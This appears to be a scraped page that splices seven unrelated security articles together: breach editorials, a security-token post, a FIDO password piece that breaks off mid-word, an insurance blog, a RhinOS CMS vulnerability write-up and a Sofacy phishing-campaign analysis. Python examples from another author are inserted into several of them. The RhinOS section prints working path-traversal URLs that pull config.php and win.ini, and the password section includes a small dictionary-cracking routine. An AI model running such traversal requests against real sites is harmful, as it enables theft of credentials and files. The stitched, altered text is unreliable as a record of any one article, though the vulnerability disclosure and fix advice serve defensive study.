
Spend More on Security


In technology, quite a few companies are doing well. In fact, there is a regular race between Apple and Microsoft for the title of the world's most valuable company. Quite a few companies in other industries are also doing very well, and many have reported strong earnings in the last couple of years. Many of those same companies have had data breaches.

I saw this tweet from Buck Woody , which says ” Another day, another breach. C’mon companies, get your act together. Spend a bit of that record profit on security. We’re tired of this.”

I agree. As someone who’s stayed at an SPG hotel, I’d guess my data has been leaked. I’m also guessing that my credit card has been changed since then, since I think I end up changing them once a year because of some data breach. Still, I think that shouldn’t be a habit I have.

Companies need to spend more than “a bit” on security. They need to train their IT staff better in secure coding and configuration, and in the tools that support those habits and processes. They also need to devote time and money to fixing past security issues. No system should be exempt from patching out of fear that an application will stop working: either internal developers need to test better, or vendor contracts need to specify that purchased software will support platform security patches, which usually means the vendor must ensure that service packs and patches don't break their product.

We need to demand more as consumers and technical people, including demanding more of ourselves. Building secure systems is hard. Writing secure code requires we change habits and sometimes do a bit more work. It’s something we all need to learn to do better.

Steve Jones

The Voice of the DBA Podcast

Listen to the MP3 audio (3.2MB) podcast or subscribe to the feed at iTunes and Libsyn.


Unresolved issues in Security Token Standards and Platforms



The ICO market has passed and the crypto community is preparing for a new era: Digital Securities Offerings, or simply STOs. Funds raised through ICOs fell below $270m in November, which may be a sign that people no longer trust ICOs. The next big stage for blockchain is security tokens that are approved by regulators and safer for investors. For now, though, it is unclear how the new platforms will work, which exchanges will adapt best to security tokens, and whether there will be a common, SEC-approved security token standard used by every project. There are more than 40 STO platforms today, but most of them have problems with their token standard, their platform, their feature set, or all three. Let's look at them.

Private key recovery

Most standards allow investors and issuers to recover their accounts after losing a private key. For an investor, the tokens are moved to a new address: some standards do this by burning the tokens at the old address and minting them at the new one, others have managers or regulators who transfer them from the old address to the new. For an issuer it is not so simple, because the token may already be trading on an exchange when the loss occurs, and reissuing tokens creates extra work for the exchanges too. The bigger problem is a stolen issuer key: unlike in an ICO, the issuer here has far more rights and power, such as access to the cap table and, in some standards, the ability to transfer tokens out of investor addresses or to change regulator contracts and managers. With those rights an attacker can create enough chaos that simply reissuing the tokens no longer fixes anything.

Multiple jurisdictions

Investors may come from different jurisdictions, each with its own, overlapping set of transfer restrictions. The usual approach is to issue a separate token for each investor type, but keeping several whitelists with different restrictions inside a single token is better.

Issuers’ power

The issuer of a security token has many rights, and sometimes they go beyond what should be allowed. For example, Atomic Capital's AtomicDSS token standard has a forceTransfer function that lets the issuer (the contract owner in this case) transfer tokens to any address without checking the transfer restrictions.
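The two points above, several jurisdictions' whitelists living in one token and an issuer-only forceTransfer that skips every check, are easier to reason about in code. The following is an added example written for this page; it is a toy Python model, not the AtomicDSS contract or any real token standard, and the addresses, jurisdictions and rules (US recipients must be accredited, EU recipients only need KYC) are constructed. It shows the per-jurisdiction restriction check, the unchecked forceTransfer the post objects to, and a controller transfer that still lets the issuer recover tokens to a lost-key holder's new address but only into a whitelisted, rule-compliant one.

```python
"""Toy model of a security token with per-jurisdiction whitelists and an issuer-only forceTransfer."""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class Investor:
    address: str
    jurisdiction: str          # e.g. "US", "EU"
    kyc_verified: bool
    accredited: bool = False


# A rule returns a rejection reason, or None when the investor may receive tokens.
Rule = Callable[[Investor], Optional[str]]


class RestrictedToken:
    """One token, several whitelists: each jurisdiction keeps its own approved addresses and extra rules."""

    def __init__(self, issuer: str) -> None:
        self.issuer = issuer
        self.balances: Dict[str, int] = {}
        self.registry: Dict[str, Investor] = {}       # address -> KYC record
        self.whitelists: Dict[str, Set[str]] = {}     # jurisdiction -> approved addresses
        self.rules: Dict[str, Rule] = {}              # jurisdiction -> extra restriction
        self.audit: List[Tuple[str, str, str, int, str]] = []

    def add_rule(self, jurisdiction: str, rule: Rule) -> None:
        self.rules[jurisdiction] = rule

    def whitelist(self, inv: Investor) -> None:
        self.registry[inv.address] = inv
        self.whitelists.setdefault(inv.jurisdiction, set()).add(inv.address)

    def mint(self, caller: str, to: str, amount: int) -> None:
        self._require_issuer(caller)
        ok, why = self.can_receive(to)
        if not ok:
            raise ValueError(why)
        self.balances[to] = self.balances.get(to, 0) + amount

    def can_receive(self, to: str) -> Tuple[bool, str]:
        """Destination-side checks: on a whitelist, KYC done, and the jurisdiction's own rule satisfied."""
        inv = self.registry.get(to)
        if inv is None or to not in self.whitelists.get(inv.jurisdiction, set()):
            return False, "recipient is not on any jurisdiction whitelist"
        if not inv.kyc_verified:
            return False, "recipient KYC not complete"
        rule = self.rules.get(inv.jurisdiction)
        reason = rule(inv) if rule else None
        return (False, reason) if reason else (True, "ok")

    def can_transfer(self, frm: str, to: str, amount: int) -> Tuple[bool, str]:
        if amount <= 0:
            return False, "amount must be positive"
        if self.balances.get(frm, 0) < amount:
            return False, "insufficient balance"
        return self.can_receive(to)

    def transfer(self, frm: str, to: str, amount: int) -> Tuple[bool, str]:
        ok, why = self.can_transfer(frm, to, amount)
        if ok:
            self._move(frm, to, amount)
            self.audit.append(("transfer", frm, to, amount, why))
        return ok, why

    def force_transfer(self, caller: str, frm: str, to: str, amount: int) -> None:
        """Issuer power of the kind the post describes: moves tokens anywhere, no restriction check at all."""
        self._require_issuer(caller)
        self._move(frm, to, amount)
        self.audit.append(("forceTransfer", frm, to, amount, "unchecked"))

    def controller_transfer(self, caller: str, frm: str, to: str, amount: int, reason: str) -> Tuple[bool, str]:
        """Hardened variant: the issuer can still recover tokens (e.g. to a lost-key holder's new
        address) but only into a whitelisted, rule-compliant address, and the reason is recorded."""
        self._require_issuer(caller)
        ok, why = self.can_transfer(frm, to, amount)
        if ok:
            self._move(frm, to, amount)
            self.audit.append(("controllerTransfer", frm, to, amount, reason))
        return ok, why

    def _require_issuer(self, caller: str) -> None:
        if caller != self.issuer:
            raise PermissionError("issuer only")

    def _move(self, frm: str, to: str, amount: int) -> None:
        if self.balances.get(frm, 0) < amount:
            raise ValueError("insufficient balance")
        self.balances[frm] -= amount
        self.balances[to] = self.balances.get(to, 0) + amount


def build_demo() -> RestrictedToken:
    """Constructed scenario (hypothetical addresses and rules): two jurisdictions in one token."""
    t = RestrictedToken(issuer="issuer")
    t.add_rule("US", lambda i: None if i.accredited else "US recipient must be an accredited investor")
    t.add_rule("EU", lambda i: None)   # in this toy model KYC alone suffices for EU recipients
    t.whitelist(Investor("alice", "EU", kyc_verified=True))
    t.whitelist(Investor("bob", "EU", kyc_verified=True))
    t.whitelist(Investor("carol", "US", kyc_verified=True, accredited=False))
    t.whitelist(Investor("dave", "US", kyc_verified=True, accredited=True))
    t.mint("issuer", "alice", 100)
    return t


if __name__ == "__main__":
    token = build_demo()
    print(token.transfer("alice", "carol", 10))        # refused: carol is not accredited
    token.force_transfer("issuer", "alice", "0xdead", 5)   # succeeds: nothing is checked
    print(token.controller_transfer("issuer", "alice", "0xdead", 5, "key recovery"))  # refused
    print(token.audit)
```

The design point is the last two calls: a privileged transfer does not have to mean an unchecked one. Routing issuer actions through the same can_transfer path, and recording why they happened, keeps the cap table consistent with the whitelists even when the issuer key is misused.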

Exchanges are not ready

Using Ethereum for security tokens may be a poor choice because of high transaction costs. Centralised exchanges are not the best venue for trading security tokens either, because the whole trade history is stored off-chain, which is less secure than keeping it on-chain. Most platforms are currently working on SEC-compliant smart contracts. The market will need a new blockchain for security tokens, with low fees, fast transactions, built-in KYC/AML, and so on.

KYC for each asset

If you are an investor who wants to take part in STOs, you currently need to pass KYC separately for each asset. Only a few platforms are thinking about a single large on-chain investor registry, which would spare investors from repeating the KYC process before every STO. It would also be useful to give each investor an ID linked to their on-chain record, with the ability to attach several addresses to one ID for investors who want to use a different address for each STO they take part in.

Conclusion

The STO market will not be like the ICO market; it will be safer for investors. But right now many projects from the ICO market are trying to move into STOs with nothing that actually relates to security tokens. The main problem in the cryptocurrency market is investors who are ready to blindly hand over all their money to a project without learning any of its details. We need smarter investors and more trustworthy projects.

Is Mapping Out Cyber Security Important?


Opinions expressed by Entrepreneur contributors are their own.

You're reading Entrepreneur India, an international franchise of Entrepreneur Media.

Flip through any newspaper and you are almost certain to come across a report of a huge sum of money being siphoned off in some new kind of cyber-attack. According to the Indian Computer Emergency Response Team (CERT-In), 27,482 cases of cybercrime were reported in a six-month span in 2018. As more people go online, phishing, probing, viruses, malicious code and ransomware have become the main modus operandi of cyber attackers.

Do rising losses and a rising cybercrime rate justify the cost of implementing expensive cybersecurity systems? Some companies lack access to proper knowledge; others find cyber-safety too expensive to install. “With a plethora of topics, adequate funds and staff, the installation of cybersecurity systems are more of a headache,” says Sakun Aggarwal, Managing Director of Krishna Brickworks, who seems satisfied with secure passwords for all his data and records.

However, losses running to millions of dollars, leaks of employees' private information, ransom demands to unlock files and other malpractices are rising significantly. Ransomware payments hit USD 2 billion in 2017, twice as much as in 2016, according to antivirus firm Bitdefender. Likewise, the breach at Equifax (EFX), one of the largest credit bureaus, in which the personal data of 145 million people was stolen, cannot be ignored. The situation is alarming, so prioritising cybersecurity has become essential.

By definition, cybersecurity means the techniques and processes for protecting computers, data and programs from unauthorised access and misuse that can lead to exploitation. Intruders typically start from a poorly protected system and move, unchecked, towards more confidential and critical information, threatening the entire environment. Knowing how such manipulation happens and what steps prevent exposure is essential, and is covered in the following points:

1. Establish secure passwords and antivirus tools

Mechanisms such as e-mail attachment scanners, strong authentication and stronger passwords are the first step in security. Passwords should not be easily guessable, and they should be unique. Ramneet Kaur, COO of Rapid Skillz, says, “Avoid using passwords with birth dates and family names. Else it becomes quite predictable and easy to guess. Use specialized skill to strengthen your passwords and secure all data.”

2. Employee training

Employees should be educated about human vulnerabilities and told that phishing is a common scam. E-mail attachments cannot be locked, so they should be opened only when the employee is certain of the sender. Employees should also avoid clicking any pop-ups that flash on the screen.

3. Steps to reduce access to information

Access to any kind of information should be restricted. Software such as proxy-testing programs, encryption software, a Virtual Private Network (VPN) and reliable security software should be installed.

Vimal Gupta, CEO of New Idea Farm Equipment Company says, “After having been duped by a fake bank call asking for the credit card number and its details, later misusing it for their personal use; we have become wary of the vulnerability around. We have installed Kaspersky software and become cautious of any fraudulent practices that are possible.”

4. Updating is the key

Professionals should be appointed to check for intrusions at regular intervals and to catch any gap left by human error. Systems have to be updated regularly. Keep track of the latest pitfalls and mistakes that are causing severe monetary losses, and of the steps being taken globally to prevent them recurring.

Arpit Jain, Founder of Promatics Information Technology suggests, “It is advisable to devise a continual back-up to prevent any fallacy and easy restoration of valuable data in case of adversity. The institute should be safely guarded against any cyber-crime possible as data is the crux of all information.”

The bottom line:

Cybersecurity is an ongoing process. It is undoubtedly expensive, but with cyber-crime growing in sophistication and pace, putting protection in place is far better than repenting later. One can always start with free security options and gradually prioritise digital data security. In the age of digitalisation, digital data is the crux of all information, and it has to be protected against any malpractice.

Can we please drive passwords into extinction now?


Passwords are antiquated and insecure. It’s time to eliminate them altogether. Experts from FIDO explain how to enable authentication without passwords.



The original version of this post was published in Forbes .

Last week it wasn’t just, as has become depressingly common, “another day, another data breach.” It was breaches that generated debates over passwords. Which provided yet more evidence that it is past time to make them extinct―since they make all of us users an endangered species.

The problems with passwords

The first came courtesy of Quora, probably the most popular Q&A site on the web. The company posted a notice of a “compromise” that affected more than 100 million registered users―an estimated third of its monthly user base.

As CEO Adam D’Angelo put it, “We recently discovered that some user data was compromised as a result of unauthorized access to one of our systems by a malicious third party.”

The other came from Citrix Systems, which forced a password reset for users of its ShareFile content collaboration service to head off what company CISO Stan Black said was not a breach of ShareFile itself, but evidence of “credential stuffing,” where hackers who have stolen emails or passwords through other breaches try to use those credentials on other sites.

Which should never happen, of course, since we are all told constantly never to use the same password for multiple sites. But, as we all know, it does happen since just about everybody does exactly that.

And it illustrates once again what numerous security experts have been saying for years: Passwords are a lousy―really lousy―way to secure anything online, especially when there are now alternatives that are much better and yes, even easier.

Don’t use the same password on multiple sites

In the case of the Quora breach, much of the speculation was about how the stored passwords had been hashed.

Multiple outlets reported that D’Angelo had first written in his blog post that the passwords were simply “hashed with a salt that varies for each user,” but after critics pointed out that a simple hash wouldn’t offer much protection, D’Angelo’s revised post said the passwords had been “hashed using bcrypt,” which would make cracking them much more difficult.

Still, D’Angelo noted that “it is generally a best practice not to reuse the same password across multiple services, and we recommend that people change their passwords if they are doing so.”
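Why "hashed with a salt" and "hashed using bcrypt" are so different in practice comes down to the cost per guess. The following is an added example for this page, not Quora's code: it stores one password two ways, as a single salted SHA-256 and through a deliberately slow key-derivation function, then runs the same small dictionary attack against both. It uses PBKDF2-HMAC from the Python standard library as a stand-in for bcrypt (which is not in the standard library); the wordlist and password are constructed. The salt defeats precomputed tables in both cases, but only the work factor makes each guess expensive.

```python
"""Salted SHA-256 vs. a slow KDF: why 'hashed with a salt' alone does little against offline cracking."""
import hashlib
import hmac
import os
import time
from typing import Callable, Dict, Iterable, Optional, Tuple

Hasher = Callable[[str, bytes], bytes]

# Constructed wordlist standing in for the leaked-password corpora attackers actually use.
WORDLIST = ["123456", "password", "qwerty", "letmein", "Summer2018!", "dragon", "iloveyou"]


def fast_salted_hash(password: str, salt: bytes) -> bytes:
    """One SHA-256 over salt||password: a per-user salt kills rainbow tables, but a GPU still
    tries billions of candidates per second against this."""
    return hashlib.sha256(salt + password.encode("utf-8")).digest()


def slow_kdf(password: str, salt: bytes, iterations: int = 100_000) -> bytes:
    """PBKDF2-HMAC-SHA256 (stdlib stand-in for bcrypt): the iteration count is the whole point,
    every guess costs the attacker the same 100k rounds it costs the server."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)


def verify(password: str, salt: bytes, stored: bytes, hasher: Hasher) -> bool:
    """Constant-time comparison so the check itself does not leak which bytes matched."""
    return hmac.compare_digest(hasher(password, salt), stored)


def crack(stored: bytes, salt: bytes, hasher: Hasher, candidates: Iterable[str]) -> Tuple[Optional[str], int]:
    """Dictionary attack on one stored hash; returns (password or None, guesses tried)."""
    tried = 0
    for cand in candidates:
        tried += 1
        if hmac.compare_digest(hasher(cand, salt), stored):
            return cand, tried
    return None, tried


def crack_cost(password: str = "Summer2018!", salt: Optional[bytes] = None) -> Dict[str, Dict[str, object]]:
    """Time the same dictionary attack under both schemes; the ratio is the defender's margin."""
    salt = salt or os.urandom(16)
    results: Dict[str, Dict[str, object]] = {}
    for name, hasher in (("sha256_salted", fast_salted_hash), ("pbkdf2_100k", slow_kdf)):
        stored = hasher(password, salt)
        t0 = time.perf_counter()
        found, tried = crack(stored, salt, hasher, WORDLIST)
        results[name] = {"found": found, "guesses": tried, "seconds": time.perf_counter() - t0}
    return results


if __name__ == "__main__":
    for name, r in crack_cost().items():
        print("%-14s found=%r after %d guesses in %.4fs" % (name, r["found"], r["guesses"], r["seconds"]))
```

On a laptop the salted SHA-256 run finishes in microseconds and the PBKDF2 run takes a noticeable fraction of a second for the same five guesses; multiply that by a real wordlist and a real user table and the work factor is what turns a breach from "all passwords recovered" into "weak passwords recovered slowly". Neither scheme helps a reused password that was already cracked elsewhere, which is the credential-stuffing problem the Citrix case illustrates.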

In the case of Citrix, Black’s declaration that “We moved quickly and decisively to end (a credential-stuffing attack) for the benefit of our users,” along with a notice that the company will be “incorporating a regularly scheduled forced password reset into our normal operating procedures,” got some major blowback from users who weren’t feeling the benefit.

They noted that it is no longer considered best practice to change passwords for no reason other than that a few months have gone by.

Just say no to forced password resets

In the comments section of Black’s post, one user wrote, “My password is securely stored in LastPass. It’s a 16-character indecipherable mass of gibberish that is unique to this site. Don’t punish me for the bad security practices of other users by forcing me to reset it on a regular basis.”



“Not to mention, forced password resets were deprecated as a best practice by NIST over two years ago.”

Indeed, that advice has been coming from more than NIST (National Institute of Standards and Technology). In March 2016, Lorrie Cranor, then chief technologist of the Federal Trade Commission (FTC), declared in a blog post that it was “time to rethink mandatory password changes .”

And security guru, author, blogger, and CTO of IBM Resilient Systems Bruce Schneier took extreme issue with a recent column in USA Today that recommended changing passwords every six months.

“No, no no―a thousand times no,” he wrote on his blog .

The reason? As experts have been saying for years, when people are forced to change their passwords regularly, they tend to use weaker ones. They make small changes to the old ones, which ends up making security weaker, not stronger.

But such squabbles wouldn’t be necessary if we weren’t using an authentication method that is demonstrably broken. Which is why numerous experts have called for eliminating passwords―the FIDO (Fast IDentity Online) Alliance has been promoting that since 2012.

Passwords are not meant for modern society

Phil Dunkelberger, CEO of Nok Nok Labs and a FIDO member, has said more than once that the username and password paradigm “was never designed for, and is inherently incapable of addressing, the use cases of modern society.”



Not just for technological reasons, of course. Users frequently make it ridiculously easy for attackers. As Nabil Hannan, managing principal at Synopsys, put it, passwords need to be obsolete because “they tend to be pretty weak or predictable, and people have a tendency to reuse the same password across different applications.”

And Brett McDowell, FIDO’s executive director, said even “strong passwords”―a phrase he labels an oxymoron―are no better, because “as long as the password is the key to get us into our accounts, users will be tricked into giving that password to the wrong party.”

Indeed, of the three most common authentication factors―something you know, something you have, and something you are―the weakest is something you know, since an effective phishing attack can trick a user into giving it away.

Authentication without passwords

McDowell said even one-time passcodes (OTP) are failing “because they can simply be given to a remote attacker as easily as a password.”

He said there is now a move to a fourth factor―behavioral authentication or “something you do”―because many companies “know they have to protect themselves from users who already have the correct passwords to get into their accounts.”

The fundamental problem, he said, is an authentication system based on “shared secrets,” where things like passwords are known by both parties of a transaction.


The solution, he said, is a system in which a user’s device “creates and uses cryptographic private keys as your new account credentials and securely stores them to your personal devic

The challenges of adopting a consistent cybersecurity framework in the insurance ...


As hacking events have increased in number and severity, we in the cybersecurity community have united around common strategies that all organizations can implement to reduce their risk. Universal best practices provide organizations with many useful tools to protect their businesses. But what often gets overlooked in these discussions are the unique security challenges that each industry faces, and the tailored solutions required to address those issues. This is an area of interest to me, and lately I've been fascinated by the path that the insurance industry is carving out when it comes to cybersecurity. Today, I'll discuss recent activity by the U.S. insurance industry and the ramifications and impact of these initiatives. In future weeks, I'll offer my insights into how other industries are confronting rising security and compliance risks.

Before we dive in, let me provide a little context into why I think we should segment out insurance as an area of focus. While in many people's minds the insurance industry is considered simply a sub-sector of the financial services sector, nothing could be further from the truth. For those not as familiar with these important nuances, it's important to point out that the insurance market has its own business needs, technology requirements and adoption cycles, and buyer personas as compared to banking and capital markets. Products (security-related or otherwise) that might resonate with a banker or IT professional in banking may not be relevant to an insurance buyer, just as products that the insurance buyer finds valuable may not appeal to the banking and capital markets. It's therefore imperative that we take stock of the insurance market's efforts and endeavors when it comes to protecting insurers, their customers, and their data.

Aligning behind a cybersecurity framework in a fragmented, state-by-state regulatory environment

In the last few years, the U.S. insurance industry has taken several steps to work on cyber issues. The most obvious example is the recent moves by the National Association of Insurance Commissioners (NAIC) to promote their Insurance Data Security Model Law . This model legislation establishes a legal framework to guide state governments as they consider enacting laws to require insurance companies to implement cybersecurity protections. In general, the NAIC has become more outspoken on cybersecurity issues (see, for example, their 2015 Cybersecurity Bill of Rights ) and has been working to ensure a consistent approach within the U.S. market.

If we look at these various activities, a few key points emerge that I think are valuable and worth keeping track of in the coming months:

Less consumer data to build profiles

Can you remember the last time you engaged with your insurance company or even used their website? If you are like most consumers, you probably only engage your insurer when a problem arises (think flood, car accident, theft, etc.). As insurers work to improve their overall security stance, it's worth remembering that most insurance companies don't typically have as much ongoing engagement with their consumer clients. This lack of ongoing engagement means that insurers struggle to build strong and reliable profiles of consumers' devices, identities, typical sign-in activity, and usage. Banks and credit unions, on the other hand, have tremendous amounts of data about their consumers, much of it because consumers make ongoing use of their online and/or mobile banking technologies throughout the month or even the week.

Fraud and security divergence

Like banking, insurance suffers from a blend of fraud and security concerns. However, those fraud concerns are dramatically different from what the banks contend with. Insurers typically worry about things like policies that are opened without someone's knowledge, policies that are fraudulently cashed in, manipulation of elderly customers, and more. While there is sometimes an overlap with security issues, for the most part these fraud trends are not directly tied to data breaches. Security issues, therefore, often compete with fraud issues for attention and resources.

Fragmented regulatory environment

Unlike banks and credit unions, insurance companies in the U.S. are not as heavily regulated at the federal level. For the most part, they are regulated by state agencies and therefore engage in a more complicated set of risk-related discussions if they do business in multiple states (as most of them do). This makes it much harder for insurers to adopt consistent cyber-prevention strategies as far as regulation is concerned. While the insurers have CISOs and strong security teams in-house, those teams are often working to address internal consistency issues having to do with risk management or with overall risk appetite.

CISO broader focus

It's no surprise that the CISOs of insurance companies continue to adopt an approach that emphasizes taking a broader risk management view of their business, and they typically communicate openly with their CEOs and boards about cyber risk. However, their particular challenge is that insurance company senior leadership uniquely understands the notion of risk and may at times downplay or take for granted cybersecurity-related risk issues. This makes the CISO's job inherently more difficult, as the CISO is effectively competing for attention and may at times be forced to stack-rank the risk they are highlighting against the risks that other peers on the senior leadership team may be highlighting (for example: liquidity risk, credit risk, etc.).

Stay current on the rapidly changing insurance sector security landscape

The state-by-state adoption of laws that are similar to or overlapping with the NAIC Insurance Data Security Model Law will continue at an unpredictable pace. As of this writing, over a half dozen states are debating these rules and determining the best way to apply the NAIC's law while also weaving in coverage from the 2017 Cybersecurity Regulation from the New York Department of Financial Services (which overlaps significantly with the NAIC law). And as we move into a post-GDPR world and consider the California Consumer Privacy Act from this past June, it will be intriguing to see how insurers and banks take their cues from one another and also continue to promulgate laws unique to their own industry needs. If you are interested in staying current on these issues, you can monitor the NAIC website. And look out for future blogs from me where I'll discuss other industries dealing with cybersecurity and compliance challenges.

The post The challenges of adopting a consistent cybersecurity framework in the insurance industry appeared first on Microsoft Secure .

*** This is a Security Bloggers Network syndicated blog from Microsoft Secure authored by Joram Borenstein. Read the original post at: https://cloudblogs.microsoft.com/microsoftsecure/2018/12/20/the-challenges-of-adopting-a-consistent-cybersecurity-framework-in-the-insurance-industry/

RhinOS CMS 3.X Arbitrary File Download Vulnerability (CVE-2018-18760)

1. Introduction

RhinOS is a framework for building websites with modern features that provides fast access to and management of web portals. RhinOS CMS has extensive site-management functionality: built-in database processes and parser modules for fast access to databases, XML and other resources, a shopping cart, tags and parameterised files, configuration parameters, intranet access, database sessions, e-mail sending, a CAPTCHA security system, fast filtering, and list and detail modules, among many others. The download.php file of RhinOS CMS contains an arbitrary file download vulnerability that lets an attacker download any file.

2. Environment setup

RhinOS CMS can be downloaded from https://sourceforge.net/projects/rhinos/. After downloading, open the file and click Next until the installation completes, as shown in Figure 1.


Figure 1: Installation complete

Because of an encoding problem, some of the post-installation text is displayed as garbage; it renders correctly on a Spanish-language system. Next, change the port in httpd.conf to 8080, to avoid conflicts with some built-in Windows services. httpd.conf is located at C:\rhinos\httpd\conf\httpd.conf, as shown in Figure 2.


Figure 2: Location of httpd.conf

Right-click to edit the file and change port 80 to 8080, as shown in Figure 3.


Figure 3: Changing the port

After changing the port, restart the Apache service, then visit http://127.0.0.1:8080 to reach the installed CMS, as shown in Figure 4.


Figure 4: Accessing the CMS after restarting Apache

3. Vulnerable code review

The vulnerability is in C:\rhinos\demo\admin\php\download.php. At line 30 you can see the path concatenation used for the file read, as shown in Figure 5.


Figure 5: download.php

Note the call to getParam(); let's look at how that method is implemented.

The function is defined at line 88 of C:\rhinos\demo\admin\php\connect.php, as shown in Figure 6.


Figure 6: connect.php

The function fetches the "file" parameter, which can be supplied via either POST or GET. The file read is then triggered at line 41 (Figure 5). Because the file parameter is attacker-controlled, this is an arbitrary file read, or equivalently an arbitrary file download, vulnerability.

4. Reproducing the vulnerability

Before reproducing, we need to find where download.php is invoked. Testing showed that the following URL exploits the vulnerability to download config.php, but an authenticated back-end (admin) session is required first. URL: http://127.0.0.1:8080/admin/inicio.php?include=php/download.php&name=efe.php&file=../config.php, as shown in Figure 7.


Figure 7: Downloading config.php

Since this is an arbitrary file download, the win.ini file in the Windows directory can of course be downloaded as well, using the URL: http://127.0.0.1:8080/admin/inicio.php?include=php/download.php&name=efe.php&file=../../../../Windows/win.ini. Requesting it downloads the file, as shown in Figure 8.


Figure 8: Downloading win.ini

5. Remediation advice

As the preceding sections show, the vulnerability poses real risk and should be fixed. Suggested fixes:

1) Filter dots [.] so that users cannot traverse to a parent directory via the URL. (Filtering alone is fragile; the decisive check is to resolve the final path and confirm it still lies inside the intended download directory.)

2) Strictly validate the format of user-supplied parameters with a regular expression, so that only well-formed values are accepted.

3) Put the download area outside the project path and assign each downloadable resource a fixed URL, rather than serving every download through one generic URL of the form:

http://127.0.0.1:8080/admin/inicio.php?include=php/download.php&name=efe.php&file=[filename]
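Fixes 1) and 2) above amount to one rule: the "file" parameter must be a single path component, and the resolved path must stay inside the download directory. The following is an added example written for this page, in Python rather than PHP and not RhinOS's own code; the download root, file names and the config.php it creates are constructed. The allow-list regex implements the input-format check, and the realpath/commonpath comparison is the containment check that also catches a symlink inside the root that points outside it, which no amount of dot filtering would catch.

```python
"""Containment check for a file-download endpoint: the fix a traversal bug like download.php's needs."""
import os
import re
import tempfile
from typing import Dict

# Allow-list for the "file" parameter: one path component, no separators, no leading dot.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,99}$")


class DownloadRefused(Exception):
    pass


def is_safe_name(name: str) -> bool:
    """Lexical check only: one component, allow-listed characters, and no '..' anywhere."""
    return bool(SAFE_NAME.fullmatch(name)) and ".." not in name


def resolve_download(root: str, requested: str) -> str:
    """Return the real path of `requested` inside `root`, or raise DownloadRefused.

    The name check stops ../ and absolute paths; the realpath/commonpath check is the one
    that actually decides, because it also catches symlinks that point outside root."""
    if not is_safe_name(requested):
        raise DownloadRefused("bad filename: %r" % requested)
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, requested))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise DownloadRefused("path escapes download root: %r" % requested)
    if not os.path.isfile(candidate):
        raise DownloadRefused("no such file: %r" % requested)
    return candidate


def demo() -> Dict[str, object]:
    """Build a throwaway download root and exercise the check; returns what happened."""
    out: Dict[str, object] = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "downloads")
        os.makedirs(root)
        with open(os.path.join(root, "report.pdf"), "wb") as f:
            f.write(b"%PDF-1.4 constructed sample\n")
        with open(os.path.join(tmp, "config.php"), "w") as f:   # outside the root, like RhinOS's config.php
            f.write("<?php $db_password = 'secret'; ?>\n")

        out["plain_ok"] = resolve_download(root, "report.pdf") == os.path.realpath(os.path.join(root, "report.pdf"))
        for bad in ("../config.php", "../../../../Windows/win.ini", "/etc/passwd", ".htaccess", ""):
            try:
                resolve_download(root, bad)
                out[bad] = "ALLOWED"
            except DownloadRefused:
                out[bad] = "refused"
        # A symlink inside the root that points outside it passes the lexical check but not containment.
        link = os.path.join(root, "notes.txt")
        try:
            os.symlink(os.path.join(tmp, "config.php"), link)
        except (OSError, NotImplementedError):
            out["symlink"] = "unsupported on this platform"
        else:
            try:
                resolve_download(root, "notes.txt")
                out["symlink"] = "ALLOWED"
            except DownloadRefused:
                out["symlink"] = "refused"
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print("%-35r %s" % (k, v))
```

Fix 3) is stronger still: if each downloadable resource is looked up by an ID in a table rather than by a user-supplied name, the file system path never comes from the request at all.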

APT front line: Sofacy keeps sending phishing e-mails to deliver Trojan variants


As Palo Alto Networks' Unit 42 threat research team noted in its earlier analysis of the Cannon Trojan, the Sofacy group (also known as Fancy Bear, APT28, STRONTIUM, Pawn Storm and Sednit) was busy attacking government and private organisations around the world from mid-October to mid-November this year. Most targets were in NATO member states, with a minority in former Soviet states. Most of these attacks aimed to deliver the Zebrocy Trojan variants Unit 42 had analysed earlier, but ESET's report shows that some of the malicious documents also delivered Cannon or a Delphi variant of Zebrocy. Since it began tracking Zebrocy in mid-2015, Unit 42 has seen its use rise steadily; compared with the other backdoors associated with Sofacy, Zebrocy is used far more often in operations.

All of the attacks Unit 42 recently analysed share one trait: the malicious documents use the same author name, Joohn. The first sample to catch Unit 42's attention was named "crash list(Lion Air Boeing 737).docx" and delivered Zebrocy. Using the AutoFocus threat-intelligence platform and data collected from VirusTotal, Unit 42 pivoted on this document's metadata and behaviour to discover the Cannon Trojan along with further malicious documents, payloads and targets.

Note that the initial attack vector in almost all of these attacks was spear-phishing e-mail. The attackers used accounts registered with a legitimate e-mail provider rather than compromised accounts, with names that closely resembled those of legitimate government organisations or other trusted third parties.

All the malicious documents are also functionally almost identical: they use Microsoft Word's remote-template feature to retrieve a malicious macro from the first-stage C2, then load and execute the initial payload. Most contain no text at all, only a generic decoy image, to induce the recipient to enable macros. This suggests the attackers relied on the filename rather than the document content to lure victims.

In total, Unit 42 captured nine distinct malicious documents between 17 October and 15 November 2018, all using the same author name (Joohn) and delivering Zebrocy or Cannon variants. Unit 42's data shows that the targets of the Dear Joohn campaign span four continents and range from federal-level to local government agencies.

Unit 42 also used the collected data to build a timeline of the Dear Joohn campaign, which shows more clearly when Sofacy attacked its targets and how it used automated tooling to do so.

Campaign analysis

Starting on 17 October, Unit 42 captured nine distinct malicious documents sent to multiple organisations worldwide. Targets included a North American foreign-affairs organisation, several European foreign-affairs organisations, and government entities in several former Soviet states. Further evidence suggests the campaign may also have targeted law-enforcement agencies in North America, Australia and Europe, and Unit 42 telemetry indicates possible targeting of NGOs, marketing firms and healthcare organisations. The attack vector in every case was spear-phishing e-mail sent from accounts registered with the free e-mail provider Seznam, a legitimate provider based in the Czech Republic. Figure 1 shows a sample phishing e-mail.


Figure 1. Sample spear-phishing e-mail sent in the Dear Joohn campaign

In this campaign Sofacy appears to have relied mainly on filenames to lure victims. Document names referenced Brexit, the Lion Air crash and the recent rocket attacks in Israel (Table 1 lists the full set of malicious documents). Although the names suggest highly targeted attacks, the actual content was largely identical: a single generic decoy image, shown in Figure 2.


Figure 2. Generic decoy image

In November Sofacy changed tactics and began using different decoy content. That month Unit 42 captured three malicious documents targeting NATO member states, each with different content, as shown in Figure 3.


Figure 3. Targeted decoy content

